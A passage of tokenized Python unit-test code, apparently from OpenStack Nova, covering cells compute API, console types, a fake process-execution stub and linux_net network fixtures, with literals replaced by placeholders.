<EOL> self . _test_delete_instance_no_cell ( '<STR_LIT>' ) <EOL> def test_get_migrations ( self ) : <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:status>' : '<STR_LIT>' } <EOL> migrations = { '<STR_LIT>' : [ { '<STR_LIT:id>' : <NUM_LIT> } ] } <EOL> cells_rpcapi = self . compute_api . cells_rpcapi <EOL> self . mox . StubOutWithMock ( cells_rpcapi , '<STR_LIT>' ) <EOL> cells_rpcapi . get_migrations ( self . context , <EOL> filters ) . AndReturn ( migrations ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . compute_api . get_migrations ( self . context , filters ) <EOL> self . assertEqual ( migrations , response ) <EOL> def test_create_block_device_mapping ( self ) : <EOL> instance_type = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> instance = self . _create_fake_instance_obj ( ) <EOL> bdms = [ block_device . BlockDeviceDict ( { '<STR_LIT>' : '<STR_LIT:image>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> } ) ] <EOL> self . compute_api . _create_block_device_mapping ( <EOL> instance_type , instance . uuid , bdms ) <EOL> bdms = db . block_device_mapping_get_all_by_instance ( <EOL> self . context , instance [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( bdms ) ) <EOL> def test_create_bdm_from_flavor ( self ) : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_rebuild_sig ( self , mock_msg ) : <EOL> def wire ( version ) : <EOL> cells_mgr = manager . CellsManager ( ) <EOL> def cast ( context , method , * args , ** kwargs ) : <EOL> fn = getattr ( cells_mgr , method ) <EOL> fn ( context , * args , ** kwargs ) <EOL> cells_mgr . cast = cast <EOL> return cells_mgr <EOL> cells_rpcapi = self . compute_api . cells_rpcapi <EOL> client = cells_rpcapi . client <EOL> with mock . patch . object ( client , '<STR_LIT>' , side_effect = wire ) : <EOL> inst = self . _create_fake_instance_obj ( ) <EOL> inst . cell_name = '<STR_LIT>' <EOL> cells_rpcapi . rebuild_instance ( self . context , inst , '<STR_LIT>' , None , <EOL> None , None , None , None , <EOL> recreate = False , <EOL> on_shared_storage = False , host = '<STR_LIT:host>' , <EOL> preserve_ephemeral = True , kwargs = None ) <EOL> self . assertEqual ( <NUM_LIT:1> , mock_msg . call_count ) <EOL> class CellsConductorAPIRPCRedirect ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CellsConductorAPIRPCRedirect , self ) . setUp ( ) <EOL> self . compute_api = compute_cells_api . ComputeCellsAPI ( ) <EOL> self . cells_rpcapi = mock . MagicMock ( ) <EOL> self . compute_api . compute_task_api . cells_rpcapi = self . cells_rpcapi <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> def test_build_instances ( self , _checks_for_create_and_rebuild , <EOL> _validate , _get_image , _check_bdm , <EOL> _provision , _record_action_start ) : <EOL> _get_image . return_value = ( None , '<STR_LIT>' ) <EOL> _validate . return_value = ( { } , <NUM_LIT:1> ) <EOL> _check_bdm . return_value = objects . BlockDeviceMappingList ( ) <EOL> _provision . return_value = '<STR_LIT>' <EOL> self . compute_api . create ( self . context , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertTrue ( self . cells_rpcapi . build_instances . called ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_utils , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_utils , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . Instance , '<STR_LIT>' ) <EOL> @ mock . patch . object ( flavors , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . BlockDeviceMappingList , '<STR_LIT>' ) <EOL> def test_resize_instance ( self , _bdms , _check , _extract , _save , _upsize , <EOL> _reserve , _cells , _record ) : <EOL> flavor = objects . Flavor ( ** test_flavor . fake_flavor ) <EOL> _extract . return_value = flavor <EOL> orig_system_metadata = { } <EOL> instance = fake_instance . fake_instance_obj ( self . context , <EOL> vm_state = vm_states . ACTIVE , cell_name = '<STR_LIT>' , <EOL> launched_at = timeutils . utcnow ( ) , <EOL> system_metadata = orig_system_metadata , <EOL> expected_attrs = [ '<STR_LIT>' ] ) <EOL> instance . flavor = flavor <EOL> instance . old_flavor = instance . new_flavor = None <EOL> self . compute_api . resize ( self . context , instance ) <EOL> self . assertTrue ( self . cells_rpcapi . resize_instance . called ) <EOL> @ mock . patch . object ( objects . RequestSpec , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . Instance , '<STR_LIT>' ) <EOL> def test_live_migrate_instance ( self , instance_save , _record , _get_spec ) : <EOL> orig_system_metadata = { } <EOL> instance = fake_instance . fake_instance_obj ( self . context , <EOL> vm_state = vm_states . ACTIVE , cell_name = '<STR_LIT>' , <EOL> launched_at = timeutils . utcnow ( ) , <EOL> system_metadata = orig_system_metadata , <EOL> expected_attrs = [ '<STR_LIT>' ] ) <EOL> self . compute_api . live_migrate ( self . context , instance , <EOL> True , True , '<STR_LIT>' ) <EOL> self . assertTrue ( self . cells_rpcapi . live_migrate_instance . called ) <EOL> @ mock . patch . object ( objects . Instance , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . Instance , '<STR_LIT>' ) <EOL> @ mock . patch . object ( objects . BlockDeviceMappingList , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> def test_rebuild_instance ( self , _record_action_start , <EOL> _checks_for_create_and_rebuild , _check_auto_disk_config , <EOL> _get_image , bdm_get_by_instance_uuid , get_flavor , instance_save ) : <EOL> orig_system_metadata = { } <EOL> instance = fake_instance . fake_instance_obj ( self . context , <EOL> vm_state = vm_states . ACTIVE , cell_name = '<STR_LIT>' , <EOL> launched_at = timeutils . utcnow ( ) , <EOL> system_metadata = orig_system_metadata , <EOL> expected_attrs = [ '<STR_LIT>' ] ) <EOL> get_flavor . return_value = '<STR_LIT>' <EOL> image_href = '<STR_LIT>' <EOL> image = { "<STR_LIT>" : <NUM_LIT:10> , "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> admin_pass = '<STR_LIT>' <EOL> files_to_inject = [ ] <EOL> bdms = objects . BlockDeviceMappingList ( ) <EOL> _get_image . return_value = ( None , image ) <EOL> bdm_get_by_instance_uuid . return_value = bdms <EOL> self . compute_api . rebuild ( self . context , instance , image_href , <EOL> admin_pass , files_to_inject ) <EOL> self . assertTrue ( self . cells_rpcapi . rebuild_instance . called ) <EOL> def test_check_equal ( self ) : <EOL> task_api = self . compute_api . compute_task_api <EOL> tests = set ( ) <EOL> for ( name , value ) in inspect . getmembers ( self , inspect . ismethod ) : <EOL> if name . startswith ( '<STR_LIT>' ) and name != '<STR_LIT>' : <EOL> tests . add ( name [ <NUM_LIT:5> : ] ) <EOL> if tests != set ( task_api . cells_compatible ) : <EOL> self . fail ( "<STR_LIT>" ) <EOL> class CellsComputePolicyTestCase ( test_compute . ComputePolicyTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CellsComputePolicyTestCase , self ) . setUp ( ) <EOL> global ORIG_COMPUTE_API <EOL> ORIG_COMPUTE_API = self . compute_api <EOL> self . compute_api = compute_cells_api . ComputeCellsAPI ( ) <EOL> deploy_stubs ( self . stubs , self . compute_api ) <EOL> def tearDown ( self ) : <EOL> global ORIG_COMPUTE_API <EOL> self . compute_api = ORIG_COMPUTE_API <EOL> super ( CellsComputePolicyTestCase , self ) . tearDown ( ) </s>
<s> from nova . console import type as ctype <EOL> from nova import test <EOL> class TypeTestCase ( test . NoDBTestCase ) : <EOL> def test_console ( self ) : <EOL> c = ctype . Console ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) <EOL> self . assertTrue ( hasattr ( c , '<STR_LIT:host>' ) ) <EOL> self . assertTrue ( hasattr ( c , '<STR_LIT:port>' ) ) <EOL> self . assertTrue ( hasattr ( c , '<STR_LIT>' ) ) <EOL> self . assertEqual ( '<STR_LIT:127.0.0.1>' , c . host ) <EOL> self . assertEqual ( <NUM_LIT> , c . port ) <EOL> self . assertIsNone ( c . internal_access_path ) <EOL> self . assertEqual ( { <EOL> '<STR_LIT:host>' : '<STR_LIT:127.0.0.1>' , <EOL> '<STR_LIT:port>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> c . get_connection_info ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_console_vnc ( self ) : <EOL> c = ctype . ConsoleVNC ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) <EOL> self . assertIsInstance ( c , ctype . Console ) <EOL> def test_console_rdp ( self ) : <EOL> c = ctype . ConsoleRDP ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) <EOL> self . assertIsInstance ( c , ctype . Console ) <EOL> def test_console_spice ( self ) : <EOL> c = ctype . ConsoleSpice ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> , tlsPort = <NUM_LIT> ) <EOL> self . assertIsInstance ( c , ctype . Console ) <EOL> self . assertEqual ( <NUM_LIT> , c . tlsPort ) <EOL> self . assertEqual ( <EOL> <NUM_LIT> , c . get_connection_info ( '<STR_LIT>' , '<STR_LIT>' ) [ '<STR_LIT>' ] ) <EOL> def test_console_serial ( self ) : <EOL> c = ctype . ConsoleSerial ( host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> ) <EOL> self . assertIsInstance ( c , ctype . Console ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from eventlet import greenthread <EOL> from oslo_concurrency import processutils <EOL> from oslo_log import log as logging <EOL> import six <EOL> LOG = logging . getLogger ( __name__ ) <EOL> _fake_execute_repliers = [ ] <EOL> _fake_execute_log = [ ] <EOL> def fake_execute_get_log ( ) : <EOL> return _fake_execute_log <EOL> def fake_execute_clear_log ( ) : <EOL> global _fake_execute_log <EOL> _fake_execute_log = [ ] <EOL> def fake_execute_set_repliers ( repliers ) : <EOL> """<STR_LIT>""" <EOL> global _fake_execute_repliers <EOL> _fake_execute_repliers = repliers <EOL> def fake_execute_default_reply_handler ( * ignore_args , ** ignore_kwargs ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' , '<STR_LIT>' <EOL> def fake_execute ( * cmd_parts , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> global _fake_execute_repliers <EOL> process_input = kwargs . get ( '<STR_LIT>' , None ) <EOL> check_exit_code = kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> delay_on_retry = kwargs . get ( '<STR_LIT>' , True ) <EOL> attempts = kwargs . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> run_as_root = kwargs . get ( '<STR_LIT>' , False ) <EOL> cmd_str = '<STR_LIT:U+0020>' . join ( str ( part ) for part in cmd_parts ) <EOL> LOG . debug ( "<STR_LIT>" , cmd_str ) <EOL> _fake_execute_log . append ( cmd_str ) <EOL> reply_handler = fake_execute_default_reply_handler <EOL> for fake_replier in _fake_execute_repliers : <EOL> if re . match ( fake_replier [ <NUM_LIT:0> ] , cmd_str ) : <EOL> reply_handler = fake_replier [ <NUM_LIT:1> ] <EOL> LOG . debug ( '<STR_LIT>' , fake_replier [ <NUM_LIT:0> ] ) <EOL> break <EOL> if isinstance ( reply_handler , six . string_types ) : <EOL> reply = reply_handler , '<STR_LIT>' <EOL> else : <EOL> try : <EOL> reply = reply_handler ( cmd_parts , <EOL> process_input = process_input , <EOL> delay_on_retry = delay_on_retry , <EOL> attempts = attempts , <EOL> run_as_root = run_as_root , <EOL> check_exit_code = check_exit_code ) <EOL> except processutils . ProcessExecutionError as e : <EOL> LOG . debug ( '<STR_LIT>' , e ) <EOL> raise <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , { '<STR_LIT>' : reply [ <NUM_LIT:0> ] , '<STR_LIT>' : reply [ <NUM_LIT:1> ] } ) <EOL> greenthread . sleep ( <NUM_LIT:0> ) <EOL> return reply <EOL> def stub_out_processutils_execute ( stubs ) : <EOL> fake_execute_set_repliers ( [ ] ) <EOL> fake_execute_clear_log ( ) <EOL> stubs . Set ( processutils , '<STR_LIT>' , fake_execute ) </s>
<s> import calendar <EOL> import datetime <EOL> import os <EOL> import re <EOL> import time <EOL> import mock <EOL> from mox3 import mox <EOL> import netifaces <EOL> from oslo_concurrency import processutils <EOL> from oslo_config import cfg <EOL> from oslo_serialization import jsonutils <EOL> from oslo_utils import fileutils <EOL> from oslo_utils import timeutils <EOL> from nova import context <EOL> from nova import db <EOL> from nova import exception <EOL> from nova . network import driver <EOL> from nova . network import linux_net <EOL> from nova . network import model as network_model <EOL> from nova import objects <EOL> from nova import test <EOL> from nova import utils <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> HOST = "<STR_LIT>" <EOL> instances = { '<STR_LIT>' : <EOL> { '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : datetime . datetime ( <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' } } <EOL> addresses = [ { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:address>" : "<STR_LIT>" } ] <EOL> networks = [ { '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } ] <EOL> fixed_ips = [ { '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] } ] <EOL> vifs = [ { '<STR_LIT:id>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:6> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:id>' : <NUM_LIT:7> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] <EOL> def get_associated ( context , network_id , host = None , address = None ) : <EOL> result = [ ] <EOL> for datum in fixed_ips : <EOL> if ( datum [ '<STR_LIT>' ] == network_id <EOL> and datum [ '<STR_LIT>' ] is not None <EOL> and datum [ '<STR_LIT>' ] is not None ) : <EOL> instance = instances [ datum [ '<STR_LIT>' ] ] <EOL> if host and host != instance [ '<STR_LIT:host>' ] : <EOL> continue <EOL> if address and address != datum [ '<STR_LIT:address>' ] : <EOL> continue <EOL> cleaned = { } <EOL> cleaned [ '<STR_LIT:address>' ] = datum [ '<STR_LIT:address>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> vif = vifs [ datum [ '<STR_LIT>' ] ] <EOL> cleaned [ '<STR_LIT>' ] = vif [ '<STR_LIT:address>' ] <EOL> cleaned [ '<STR_LIT>' ] = instance [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = instance [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = instance [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> cleaned [ '<STR_LIT>' ] = datum [ '<STR_LIT>' ] <EOL> result . append ( cleaned ) <EOL> return result <EOL> class LinuxNetworkUtilsTestCase ( test . NoDBTestCase ) : <EOL> def test_is_pid_cmdline_correct ( self ) : <EOL> fake_open = mock . mock_open ( read_data = '<STR_LIT>' ) <EOL> with mock . patch . object ( linux_net , '<STR_LIT>' , fake_open , create = True ) : <EOL> self . assertFalse ( linux_net . is_pid_cmdline_correct ( <NUM_LIT:1> , "<STR_LIT:foo>" ) , <EOL> "<STR_LIT>" ) <EOL> fake_open = mock . mock_open ( <EOL> read_data = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> with mock . patch . object ( linux_net , '<STR_LIT>' , 